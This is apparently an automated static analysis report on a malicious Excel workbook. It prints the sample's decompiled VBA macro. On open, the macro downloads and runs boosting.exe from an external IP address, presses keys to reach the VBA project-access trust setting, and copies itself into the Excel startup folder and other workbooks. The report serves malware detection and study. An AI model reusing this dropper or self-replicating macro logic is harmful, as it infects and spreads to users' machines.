Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 03dbbb783f1a26df…

MALICIOUS

Office (OLE) / .XLS

Size: 284.5 KB
Created: 2009-06-18 12:15:15
Authoring application: Microsoft Excel
First seen: 2026-06-28
MD5: 82573b34e7ccdba099230c56ceff9876
SHA-1: 6af4ef0d7fed5f368aa5b5407f6cd8201bb1bf38
SHA-256: 03dbbb783f1a26dfccf786fe0c5b6c923c0bed3cbc7d15e50ba1b6f7546601cc
Risk score: 224

Heuristics (7)

  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA project contains no executable statements [info] (1 related finding) OLE_VBA_MACROS
    Document contains a VBA project, but the extracted modules contain only attributes/options/comments and no executable statements.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://45.78.21.150/boost/boosting.exe (in document text, OLE body)
    • http://45.78.21.150/boost/config.txt (in document text, OLE body)
    • http://45.78.21.150/boost/boo (URL truncated as extracted; in macro / runtime command snippet)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12680 bytes
SHA-256: 6aed6f8999a97626046f1f6fed31a43621ab40f91b948df61e3397ad9a778dff
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/3524ab4f8fff466f80dfeb75ab7af1a8.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 13349 bytes
' Line #0:
' 	FuncDefn (Function URLDownloadToFile(ByVal pCaller As Long) As Long)
' Line #1:
' 	FuncDefn (Function ShellExecute(ByVal hWnd As Long) As Long)
' Line #2:
' 	Dim (Private) 
' 	VarDefn (WithEvents) app 0x0000
' Line #3:
' Line #4:
' 	FuncDefn (Sub boosting())
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	OnError (Resume Next) 
' Line #7:
' 	SetStmt 
' 	LitStr 0x000D "Win32_Process"
' 	LitStr 0x000C "winmgmts:\\."
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd InstancesOf 0x0001 
' 	Set pro 
' Line #8:
' 	LitDI2 0x0000 
' 	St boo 
' Line #9:
' 	StartForVariable 
' 	Ld ps 
' 	EndForVariable 
' 	Ld pro 
' 	ForEach 
' Line #10:
' 	Ld ps 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.exe"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St boo 
' 	EndIf 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	Ld boo 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #13:
' 	ExitSub 
' Line #14:
' 	ElseBlock 
' Line #15:
' 	LitStr 0x0015 "ping www.163.com -n 1"
' 	LitDI2 0x0000 
' 	LitVarSpecial (True)
' 	LitStr 0x000D "Wscript.shell"
' 	ArgsLd CreateObject 0x0001 
' 	ArgsMemLd Run 0x0003 
' 	St oExec 
' Line #16:
' 	Ld oExec 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitDI2 0x0000 
' 	LitStr 0x0026 "http://45.78.21.150/boost/boosting.exe"
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0024 "http://45.78.21.150/boost/config.txt"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitDI4 0x0000 0x0000 
' 	Ld vbNullString 
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	Ld vbNullString 
' 	LitDI2 0x0000 
' 	ArgsCall ShellExecute 0x0006 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Sub runtimer())
' Line #24:
' 	Ld Now 
' 	LitStr 0x0008 "00:00:03"
' 	ArgsLd TimeValue 0x0001 
' 	Add 
' 	LitStr 0x0011 "thisworkbook.p2dd"
' 	Ld Application 
' 	ArgsMemCall OnTime 0x0002 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' 	FuncDefn (Sub p2dd())
' Line #28:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #29:
' 	OnError (Resume Next) 
' Line #30:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #31:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #32:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #33:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #34:
' 	ArgsCall DoEvents 0x0000 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0034 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0038 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #37:
' 	LitStr 0x0006 "update"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	LitStr 0x000B "OfficeCheck"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #38:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St k 
' Line #39:
' 	LitDI2 0x0001 
' 	Ld k 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #40:
' 	EndIfBlock 
' Line #41:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb
' Line #42:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #43:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #44:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #45:
' 	StartForVariable 
' 	Next 
' Line #46:
' 	EndWith 
' Line #47:
' Line #48:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #50:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #51:
' 	LitDI2 0x0097 
' 	LitStr 0x0008 "Call d2p"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #52:
' 	LitDI2 0x0098 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #53:
' 	LitDI2 0x0099 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #54:
' 	EndIfBlock 
' Line #55:
' 	EndIfBlock 
' Line #56:
' 	EndSub 
' Line #57:
' Line #58:
' 	FuncDefn (Sub d2p())
' Line #59:
' 	Dim 
' 	VarDefn pth (As String)
' Line #60:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb
' Line #61:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #62:
' 	OnError (Resume Next) 
' Line #63:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000D "\boosting.xls"
' 	Concat 
' 	St pth1 
' Line #64:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #65:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #66:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #67:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #68:
' 	ArgsCall DoEvents 0x0000 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	Ld pth1 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #71:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #72:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Ne 
' 	IfBlock 
' Line #73:
' 	Ld pth1 
' 	ParamNamed Filename 
' 	LitDI2 0x0012 
' 	ParamNamed FileFormat 
' 	Ld Workbooks 
' 	MemLd Add 
' 	ArgsMemCall SaveAs 0x0002 
' Line #74:
' 	QuoteRem 0x0000 0x0004 "Else"
' Line #75:
' 	QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #76:
' 	EndIfBlock 
' Line #77:
' 	SetStmt 
' 	Ld pth1 
' 	Ld Workbooks 
' 	ArgsMemLd Open 0x0001 
' 	Set Wb 
' Line #78:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #79:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #80:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #81:
' 	StartForVariable 
' 	Next 
' Line #82:
' 	EndWith 
' Line #83:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.xls"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #84:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #85:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #86:
' 	LitDI2 0x0097 
' 	LitStr 0x0015 "Set App = Application"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #87:
' 	LitDI2 0x0098 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #88:
' 	LitDI2 0x0099 
' 	LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #89:
' 	LitDI2 0x009A 
' 	LitStr 0x000D "Call runtimer"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #90:
' 	LitDI2 0x009B 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #91:
' 	LitDI2 0x009C 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #92:
' 	EndIfBlock 
' Line #93:
' 	LitVarSpecial (True)
' 	Ld ActiveWorkbook 
' 	MemSt IsAddin 
' Line #94:
' 	Ld Wb 
' 	ArgsMemCall Save 0x0000 
' Line #95:
' 	Ld Wb 
' 	ArgsMemCall Close 0x0000 
' Line #96:
' 	EndIfBlock 
' Line #97:
' 	Ld pth1 
' 	Paren 
' 	Ld Workbooks 
' 	ArgsMemCall Open 0x0001 
' Line #98:
' 	EndSub 
' Line #99:
' Line #100:
' Line #101:
' 	FuncDefn (Sub Workbook_Open())
' Line #102:
' 	ArgsCall (Call) d2p 0x0000 
' Line #103:
' 	ArgsCall (Call) boosting 0x0000 
' Line #104:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet6 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet4 - 999 bytes
' _VBA_PROJECT_CUR/VBA/Sheet5 - 999 bytes